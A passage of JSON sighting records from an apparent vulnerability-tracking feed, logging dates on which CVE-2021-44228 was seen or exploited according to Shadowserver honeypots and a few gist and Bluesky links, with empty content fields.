"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "9a419263-a029-45a2-89be-3c077cc2f69e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "30c707bf-675c-40ab-b6d9-1832044fe660", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://gist.github.com/alliehighenhall/03cc37f344e80162d1f1371658d72119", "content": "", "creation_timestamp": "2025-05-09T22:44:13.000000Z"}, {"uuid": "e950e471-1b48-460c-8a58-bc9d3422bd64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "95e69287-0726-4fba-8ca2-4e07b5f439d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-25)", "content": "", "creation_timestamp": "2025-06-25T00:00:00.000000Z"}, {"uuid": "e1a8ead2-1296-495f-9a1a-98b66b9975cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "8e889857-2ec2-4ae1-ae07-64e0b0cc1b49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-10)", "content": "", "creation_timestamp": "2025-05-10T00:00:00.000000Z"}, {"uuid": "91a7d161-ca7a-4c5b-a680-a0a668d9a483", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "9a9f923f-fd93-4d87-9483-8aaf76f8adb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-11)", "content": "", "creation_timestamp": "2025-05-11T00:00:00.000000Z"}, {"uuid": "832db776-deab-4f52-ba08-963420b6df59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-09)", "content": "", "creation_timestamp": "2025-05-09T00:00:00.000000Z"}, {"uuid": "cc280560-cc76-4299-a680-25f2c0293451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-06)", "content": "", "creation_timestamp": "2025-07-06T00:00:00.000000Z"}, {"uuid": "3be72d8f-c0e6-4dc8-93ff-a4808da8d475", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "10e077a6-ccf6-4264-930a-219df1354a8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-27)", "content": "", "creation_timestamp": "2025-05-27T00:00:00.000000Z"}, {"uuid": "176a1b2f-a4c2-49b2-bda9-4e28529a55f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3lq2yl6rtkk2y", "content": "", "creation_timestamp": "2025-05-26T10:44:40.184873Z"}, {"uuid": "90738347-4e34-4efc-9597-11139df5dae9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/Mickael5466/a81c256220e1573571bf040c96115212", "content": "", "creation_timestamp": "2025-06-21T19:15:54.000000Z"}, {"uuid": "0b467b7d-c6b6-49e5-8dea-ea21b9a91800", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-10)", "content": "", "creation_timestamp": "2025-05-10T00:00:00.000000Z"}, {"uuid": "0d0603db-ad94-4a27-a140-7c025d806aa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-25)", "content": "", "creation_timestamp": "2025-05-25T00:00:00.000000Z"}, {"uuid": "b51fec1b-8ac8-43de-89e9-421ee1c5aee3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-12)", "content": "", "creation_timestamp": "2025-05-12T00:00:00.000000Z"}, {"uuid": "49eaf2cb-d2ee-4a0b-8ee7-2dfe6a878d0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-20)", "content": "", "creation_timestamp": "2025-05-20T00:00:00.000000Z"}, {"uuid": "36bdfec0-d70f-4194-a160-dfe48375977d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-15)", "content": "", "creation_timestamp": "2025-06-15T00:00:00.000000Z"}, {"uuid": "de481d8b-936b-44fa-953d-5097a36767c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-29)", "content": "", "creation_timestamp": "2025-06-29T00:00:00.000000Z"}, {"uuid": "e625b116-5541-4615-80cb-cc205755985d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-06)", "content": "", "creation_timestamp": "2025-06-06T00:00:00.000000Z"}, {"uuid": "6e0ea608-1894-42d2-aa12-55411f5650b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/softwaremill.com/post/3lpolc3nbsc2l", "content": "", "creation_timestamp": "2025-05-21T12:15:00.412997Z"}, {"uuid": "55893a04-7a2a-4448-b590-18fec142268a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3ltqf65gz362c", "content": "", "creation_timestamp": "2025-07-12T03:11:27.678269Z"}, {"uuid": "56e7b1e5-4608-41c3-b543-706621a0db90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-29)", "content": "", "creation_timestamp": "2025-05-29T00:00:00.000000Z"}, {"uuid": "58d4a2fe-2981-4493-b2be-16ebec065e0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-04)", "content": "", "creation_timestamp": "2025-07-04T00:00:00.000000Z"}, {"uuid": "0d81113e-a54b-4c57-9f44-64609102b747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-08)", "content": "", "creation_timestamp": "2025-07-08T00:00:00.000000Z"}, {"uuid": "735691b0-fac6-4dee-8a1a-ef2dd3d1365b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-13)", "content": "", "creation_timestamp": "2025-05-13T00:00:00.000000Z"}, {"uuid": "a46cc15e-b15d-4940-819e-dd2963bbd779", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-04)", "content": "", "creation_timestamp": "2025-06-04T00:00:00.000000Z"}, {"uuid": "2f020871-f199-4ee0-9dbf-632b889af54e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-09)", "content": "", "creation_timestamp": "2025-06-09T00:00:00.000000Z"}, {"uuid": "9f12c3ee-3a3f-40e2-becf-1eed8092340e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-01)", "content": "", "creation_timestamp": "2025-06-01T00:00:00.000000Z"}, {"uuid": "c289fde0-9b05-4b24-9aad-341b58478bb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-14)", "content": "", "creation_timestamp": "2025-05-14T00:00:00.000000Z"}, {"uuid": "f784ae80-4cc0-41ed-84c7-0707bda61e9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-27)", "content": "", "creation_timestamp": "2025-06-27T00:00:00.000000Z"}, {"uuid": "e05153b3-489a-4719-8401-3ad3a2f53863", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-11)", "content": "", "creation_timestamp": "2025-07-11T00:00:00.000000Z"}, {"uuid": "ff66d91e-fe8f-4d8d-b744-bb07b78eabc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-16)", "content": "", "creation_timestamp": "2025-07-16T00:00:00.000000Z"}, {"uuid": "e8636319-abf9-4e7d-9d61-18474a25610b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-01)", "content": "", "creation_timestamp": "2025-10-01T00:00:00.000000Z"}, {"uuid": "3a9cd56d-924c-4d66-99cf-20e10294edb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-17)", "content": "", "creation_timestamp": "2025-07-17T00:00:00.000000Z"}, {"uuid": "779140d6-6c20-47ea-9095-28a3bd8dcfdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-19)", "content": "", "creation_timestamp": "2025-09-19T00:00:00.000000Z"}, {"uuid": "fb117050-4865-49ce-b478-3b594bce2150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-20)", "content": "", "creation_timestamp": "2025-07-20T00:00:00.000000Z"}, {"uuid": "d832ba78-1b84-4631-b5c6-be60beddadc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-21)", "content": "", "creation_timestamp": "2025-07-21T00:00:00.000000Z"}, {"uuid": "69f4021e-ca52-415d-b3a6-d7721cb8311f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-01)", "content": "", "creation_timestamp": "2025-10-01T00:00:00.000000Z"}, {"uuid": "e4b596d7-1759-43f9-abb9-52c1778a6a21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-23)", "content": "", "creation_timestamp": "2025-07-23T00:00:00.000000Z"}, {"uuid": "3106192c-6b9a-4f98-aaff-7de1c14ab5f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-18)", "content": "", "creation_timestamp": "2025-10-18T00:00:00.000000Z"}, {"uuid": "e7b33d36-3f9c-4dcf-94d9-7200caf76364", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-21)", "content": "", "creation_timestamp": "2025-10-21T00:00:00.000000Z"}, {"uuid": "e852f973-5b41-459b-a1cc-7303e04efed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-05)", "content": "", "creation_timestamp": "2025-09-05T00:00:00.000000Z"}, {"uuid": "a28fc933-6132-4e9a-b819-bf8da1cd3138", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-22)", "content": "", "creation_timestamp": "2025-07-22T00:00:00.000000Z"}, {"uuid": "a93e63ca-253d-4471-9666-b45104413808", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-12)", "content": "", "creation_timestamp": "2025-09-12T00:00:00.000000Z"}, {"uuid": "45101bf9-4c34-4f1b-b9d3-8e14a78339fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/Darkcrai86/bdd48db9f957a950aa67540d0a27bca9", "content": "", "creation_timestamp": "2025-09-20T18:32:29.000000Z"}, {"uuid": "2cac9c48-4c62-4189-9dda-458a2f556ae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/Darkcrai86/57f88e73880b63fa77c9742ba6612bea", "content": "", "creation_timestamp": "2025-09-20T13:26:15.000000Z"}, {"uuid": "1b621053-ac96-46c9-a906-4a2983a4356a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-27)", "content": "", "creation_timestamp": "2025-10-27T00:00:00.000000Z"}, {"uuid": "ff639b12-841c-432a-8b8a-aa50c21a02c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-21)", "content": "", "creation_timestamp": "2025-11-21T00:00:00.000000Z"}, {"uuid": "b8b6240c-1cd8-4fd1-aa83-f318de2acd05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-25)", "content": "", "creation_timestamp": "2025-10-25T00:00:00.000000Z"}, {"uuid": "a0c385b4-469b-4ab7-adfe-837bc8f6ebb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-17)", "content": "", "creation_timestamp": "2025-11-17T00:00:00.000000Z"}, {"uuid": "cd354396-fdfa-4d31-bb72-222ee7ab1435", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-24)", "content": "", "creation_timestamp": "2025-07-24T00:00:00.000000Z"}, {"uuid": "bc931ade-9489-4ff7-8137-4db26553955b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-07)", "content": "", "creation_timestamp": "2025-11-07T00:00:00.000000Z"}, {"uuid": "40585200-2701-4c16-9029-1ee652e5d61a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-25)", "content": "", "creation_timestamp": "2025-07-25T00:00:00.000000Z"}, {"uuid": "a8865174-da33-412b-824e-fe5bbb4b6401", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-13)", "content": "", "creation_timestamp": "2025-10-13T00:00:00.000000Z"}, {"uuid": "b004318e-b75d-46d7-b553-9c7dd579c29c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-26)", "content": "", "creation_timestamp": "2025-07-26T00:00:00.000000Z"}, {"uuid": "623960f9-6de2-4186-9c31-3eaccdea550f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-25)", "content": "", "creation_timestamp": "2025-09-25T00:00:00.000000Z"}, {"uuid": "9b5a2a49-24d9-410b-8bf6-4a155115a1e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-28)", "content": "", "creation_timestamp": "2025-07-28T00:00:00.000000Z"}, {"uuid": "cc13de1f-1a15-4ff8-905a-2b98c6768565", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-27)", "content": "", "creation_timestamp": "2025-07-27T00:00:00.000000Z"}, {"uuid": "eef0f539-ef16-4bd8-937e-c3bf7cf0cb3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-27)", "content": "", "creation_timestamp": "2025-09-27T00:00:00.000000Z"}, {"uuid": "9612daaa-df4b-484e-b3ae-ab38f48b534b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-29)", "content": "", "creation_timestamp": "2025-10-29T00:00:00.000000Z"}, {"uuid": "261f7da7-7f32-47e6-ab3d-6c3f372244d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-15)", "content": "", "creation_timestamp": "2025-11-15T00:00:00.000000Z"}, {"uuid": "ca931e89-a699-4118-9996-4fc20bd38897", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-06)", "content": "", "creation_timestamp": "2025-10-06T00:00:00.000000Z"}, {"uuid": "41bd1675-5f2c-43d8-9662-a92bc10af858", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-30)", "content": "", "creation_timestamp": "2025-07-30T00:00:00.000000Z"}, {"uuid": "61848ba1-2767-4b91-b28f-8eeea892b2e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-29)", "content": "", "creation_timestamp": "2025-07-29T00:00:00.000000Z"}, {"uuid": "a95ac795-e005-44cc-bbf6-487845ad9fca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/liminalitycarb.live/post/3m5cdijrh3k2o", "content": "", "creation_timestamp": "2025-11-10T19:16:08.782039Z"}, {"uuid": "a8c4ad3d-90bc-4f08-920a-d7a6bb667577", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-31)", "content": "", "creation_timestamp": "2025-07-31T00:00:00.000000Z"}, {"uuid": "d8848c68-8f81-44ec-b005-2f314261440b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-02)", "content": "", "creation_timestamp": "2025-08-02T00:00:00.000000Z"}, {"uuid": "02fd1974-2b0f-482c-b11b-f9b545301219", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-16)", "content": "", "creation_timestamp": "2025-09-16T00:00:00.000000Z"}, {"uuid": "21a9be0b-7433-4f1a-9dc8-d7b5811bc52f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-20)", "content": "", "creation_timestamp": "2025-09-20T00:00:00.000000Z"}, {"uuid": "913af35b-d15a-4ef6-8eaa-b3a4b47b010a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-15)", "content": "", "creation_timestamp": "2025-10-15T00:00:00.000000Z"}, {"uuid": "25129fbc-60e0-4c9d-b40b-380c01f10a64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-03)", "content": "", "creation_timestamp": "2025-08-03T00:00:00.000000Z"}, {"uuid": 